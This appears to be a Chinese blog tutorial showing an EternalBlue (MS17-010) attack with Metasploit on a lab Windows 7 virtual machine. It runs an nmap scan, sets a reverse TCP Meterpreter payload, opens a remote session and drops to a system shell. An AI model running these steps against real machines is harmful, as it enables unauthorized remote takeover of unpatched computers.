使用Metasploit(msf)通过ms17_010_eternalblue漏洞控制Windows电脑

首先给大家介绍一下两样东西:

使用Metasploit(msf)通过ms17_010_eternalblue漏洞控制Windows电脑_第1张图片

使用Metasploit(msf)通过ms17_010_eternalblue漏洞控制Windows电脑_第2张图片

大家要清楚一点,擅自攻击别人电脑是违法行为。

然后开始讲解本次的主题。。。。

首先打开Kali(一个著名的渗透测试专用的Linux系统,渗透测试必须的工具)。

然后打开应用程序-漏洞利用工具集-metasploit。

成功后显示如下:

[i] Database already started
[i] The database appears to be already configured, skipping initialization

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

直接利用nmap对10.0.3.65主机进行端口扫描:

msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65

结果如下:

TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:56
Scanning 10.0.3.65 [1 port]
Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 10.0.3.65 [65535 ports]
Discovered open port 139/tcp on 10.0.3.65
Discovered open port 135/tcp on 10.0.3.65
Discovered open port 3389/tcp on 10.0.3.65
Discovered open port 445/tcp on 10.0.3.65
Discovered open port 49153/tcp on 10.0.3.65
Discovered open port 49157/tcp on 10.0.3.65
Discovered open port 49152/tcp on 10.0.3.65
Discovered open port 49155/tcp on 10.0.3.65
Discovered open port 49154/tcp on 10.0.3.65
Discovered open port 49156/tcp on 10.0.3.65
Discovered open port 1688/tcp on 10.0.3.65
Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)
Initiating Service scan at 10:57
Scanning 11 services on 10.0.3.65
Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)
Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.0.3.65
NSE: Script scanning 10.0.3.65.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
1688/tcp  open  msrpc          Microsoft Windows RPC
3389/tcp  open  ms-wbt-server?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49156/tcp open  msrpc          Microsoft Windows RPC
49157/tcp open  msrpc          Microsoft Windows RPC
MAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.311 days (since Tue Aug  7 03:30:19 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds
           Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)

发现该主机是Windows7系统,并且开放了445端口,那么就有极大概率可以利用ms17_010_eternalblue漏洞了。如果发现主机不是win7或者没有开放该端口,那么本次实验就到此为止。。(꒪ꇴ꒪(꒪ꇴ꒪ ;)哈?

接下来,首先利用改漏洞,输入:

msf > use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue漏洞
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65
rhost => 10.0.3.65 //设置攻击目标
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用meterpreter,这个是好东西,可以提供很多有意思的功能,不设置也可以,不设置的话就是直接获取到windows的cmd
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > run //开始攻击

显示结果如下:

[*] Started reverse TCP handler on 10.0.3.215:4444 
[*] 10.0.3.65:445 - Connecting to target for exploitation.
[+] 10.0.3.65:445 - Connection established for exploitation.
[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.3.65:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.0.3.65:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.0.3.65:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.
[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet
[*] 10.0.3.65:445 - Starting non-paged pool grooming
[+] 10.0.3.65:445 - Sending SMBv2 buffers
[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.3.65:445 - Sending final SMBv2 buffers.
[*] 10.0.3.65:445 - Sending last fragment of exploit packet!
[*] 10.0.3.65:445 - Receiving response from exploit packet
[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.3.65:445 - Sending egg to corrupted connection.
[*] 10.0.3.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.0.3.65
[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

查看系统信息sysinfo:

meterpreter > sysinfo

Computer        : WIN-EEGC1ODGIOU
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

获取命令行shell:

meterpreter > shell

Process 2772 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo

主机名:           WIN-EEGC1ODGIOU
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00371-OEM-8992671-00524
初始安装日期:     2017/8/25, 16:31:04
系统启动时间:     2018/8/7, 11:59:41
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,542 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,569 MB
虚拟内存: 使用中: 526 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 1 个修补程序。
                  [01]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   是
                      DHCP 服务器: 10.0.3.1
                      IP 地址
                        [01]: 10.0.3.65
                        [02]: fe80::dec:dc90:295b:668c

C:\Windows\system32>

退出:

C:\Windows\system32>exit
exit
meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.3.65 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > 

具体的一些命令请参考这篇文章:

http://blog.51cto.com/helloeveryone/1112040

你可能感兴趣的:(移动应用安全,iOS应用程序安全)